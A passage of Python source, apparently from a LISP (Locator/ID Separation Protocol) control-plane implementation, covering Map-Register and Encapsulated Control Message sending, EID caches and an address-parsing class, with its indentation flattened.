lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
